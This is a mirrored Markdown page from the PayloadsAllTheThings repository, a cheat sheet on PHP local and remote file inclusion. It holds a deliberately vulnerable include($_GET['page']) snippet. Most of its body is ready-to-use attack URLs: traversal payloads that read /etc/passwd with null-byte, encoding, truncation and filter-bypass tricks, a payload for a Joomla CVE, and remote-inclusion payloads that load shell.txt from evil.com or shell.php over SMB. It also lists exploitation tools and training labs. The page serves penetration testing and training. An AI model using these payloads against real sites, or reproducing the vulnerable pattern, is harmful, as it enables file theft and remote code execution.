mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-22 11:18:50 +00:00
157 lines
6.4 KiB
Markdown
157 lines
6.4 KiB
Markdown
# File Inclusion
|
|
|
|
> A File Inclusion Vulnerability refers to a type of security vulnerability in web applications, particularly prevalent in applications developed in PHP, where an attacker can include a file, usually exploiting a lack of proper input/output sanitization. This vulnerability can lead to a range of malicious activities, including code execution, data theft, and website defacement.
|
|
|
|
## Summary
|
|
|
|
- [Tools](#tools)
|
|
- [Local File Inclusion](#local-file-inclusion)
|
|
- [Null Byte](#null-byte)
|
|
- [Double Encoding](#double-encoding)
|
|
- [UTF-8 Encoding](#utf-8-encoding)
|
|
- [Path Truncation](#path-truncation)
|
|
- [Filter Bypass](#filter-bypass)
|
|
- [Remote File Inclusion](#remote-file-inclusion)
|
|
- [Null Byte](#null-byte-1)
|
|
- [Double Encoding](#double-encoding-1)
|
|
- [Bypass allow_url_include](#bypass-allow_url_include)
|
|
- [Labs](#labs)
|
|
- [References](#references)
|
|
|
|
|
|
## Tools
|
|
|
|
* [P0cL4bs/Kadimus](https://github.com/P0cL4bs/Kadimus) (archived on Oct 7, 2020) - kadimus is a tool to check and exploit lfi vulnerability.
|
|
* [D35m0nd142/LFISuite](https://github.com/D35m0nd142/LFISuite) - Totally Automatic LFI Exploiter (+ Reverse Shell) and Scanner
|
|
* [kurobeats/fimap](https://github.com/kurobeats/fimap) - fimap is a little python tool which can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps.
|
|
* [lightos/Panoptic](https://github.com/lightos/Panoptic) - Panoptic is an open source penetration testing tool that automates the process of search and retrieval of content for common log and config files through path traversal vulnerabilities.
|
|
* [hansmach1ne/LFImap](https://github.com/hansmach1ne/LFImap) - Local File Inclusion discovery and exploitation tool
|
|
|
|
|
|
## Local File Inclusion
|
|
|
|
**File Inclusion Vulnerability** should be differentiated from **Path Traversal**. The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the target application, when the File Inclusion will lead to the execution of arbitrary code.
|
|
|
|
Consider a PHP script that includes a file based on user input. If proper sanitization is not in place, an attacker could manipulate the `page` parameter to include local or remote files, leading to unauthorized access or code execution.
|
|
|
|
```php
|
|
<?php
|
|
$file = $_GET['page'];
|
|
include($file);
|
|
?>
|
|
```
|
|
|
|
In the following examples we include the `/etc/passwd` file, check the `Directory & Path Traversal` chapter for more interesting files.
|
|
|
|
```powershell
|
|
http://example.com/index.php?page=../../../etc/passwd
|
|
```
|
|
|
|
|
|
|
|
### Null Byte
|
|
|
|
:warning: In versions of PHP below 5.3.4 we can terminate with null byte (`%00`).
|
|
|
|
```powershell
|
|
http://example.com/index.php?page=../../../etc/passwd%00
|
|
```
|
|
|
|
**Example**: Joomla! Component Web TV 1.0 - CVE-2010-1470
|
|
|
|
```ps1
|
|
{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00
|
|
```
|
|
|
|
|
|
### Double Encoding
|
|
|
|
```powershell
|
|
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
|
|
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
|
|
```
|
|
|
|
|
|
### UTF-8 Encoding
|
|
|
|
```powershell
|
|
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
|
|
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00
|
|
```
|
|
|
|
### Path Truncation
|
|
|
|
On most PHP installations a filename longer than `4096` bytes will be cut off so any excess chars will be thrown away.
|
|
|
|
```powershell
|
|
http://example.com/index.php?page=../../../etc/passwd............[ADD MORE]
|
|
http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE]
|
|
http://example.com/index.php?page=../../../etc/passwd/./././././.[ADD MORE]
|
|
http://example.com/index.php?page=../../../[ADD MORE]../../../../etc/passwd
|
|
```
|
|
|
|
### Filter Bypass
|
|
|
|
```powershell
|
|
http://example.com/index.php?page=....//....//etc/passwd
|
|
http://example.com/index.php?page=..///////..////..//////etc/passwd
|
|
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
|
|
```
|
|
|
|
|
|
## Remote File Inclusion
|
|
|
|
> Remote File Inclusion (RFI) is a type of vulnerability that occurs when an application includes a remote file, usually through user input, without properly validating or sanitizing the input.
|
|
|
|
Remote File Inclusion doesn't work anymore on a default configuration since `allow_url_include` is now disabled since PHP 5.
|
|
|
|
```ini
|
|
allow_url_include = On
|
|
```
|
|
|
|
|
|
Most of the filter bypasses from LFI section can be reused for RFI.
|
|
|
|
```powershell
|
|
http://example.com/index.php?page=http://evil.com/shell.txt
|
|
```
|
|
|
|
### Null Byte
|
|
|
|
```powershell
|
|
http://example.com/index.php?page=http://evil.com/shell.txt%00
|
|
```
|
|
|
|
|
|
### Double Encoding
|
|
|
|
```powershell
|
|
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
|
|
```
|
|
|
|
|
|
### Bypass allow_url_include
|
|
|
|
When `allow_url_include` and `allow_url_fopen` are set to `Off`. It is still possible to include a remote file on Windows box using the `smb` protocol.
|
|
|
|
1. Create a share open to everyone
|
|
2. Write a PHP code inside a file : `shell.php`
|
|
3. Include it `http://example.com/index.php?page=\\10.0.0.1\share\shell.php`
|
|
|
|
|
|
## Labs
|
|
|
|
* [Root Me - Local File Inclusion](https://www.root-me.org/en/Challenges/Web-Server/Local-File-Inclusion)
|
|
* [Root Me - Local File Inclusion - Double encoding](https://www.root-me.org/en/Challenges/Web-Server/Local-File-Inclusion-Double-encoding)
|
|
* [Root Me - Remote File Inclusion](https://www.root-me.org/en/Challenges/Web-Server/Remote-File-Inclusion)
|
|
* [Root Me - PHP - Filters](https://www.root-me.org/en/Challenges/Web-Server/PHP-Filters)
|
|
|
|
|
|
## References
|
|
|
|
* [CVV #1: Local File Inclusion - SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)
|
|
* [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction - Mannu Linux - 2019-05-12](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html)
|
|
* [Is PHP vulnerable and under what conditions? - April 13, 2015 - Andreas Venieris](http://0x191unauthorized.blogspot.fr/2015/04/is-php-vulnerable-and-under-what.html)
|
|
* [LFI Cheat Sheet - @Arr0way - 24 Apr 2016](https://highon.coffee/blog/lfi-cheat-sheet/)
|
|
* [Testing for Local File Inclusion - OWASP - 25 June 2017](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
|
|
* [Turning LFI into RFI - Grayson Christopher - 2017-08-14](https://web.archive.org/web/20170815004721/https://l.avala.mp/?p=241) |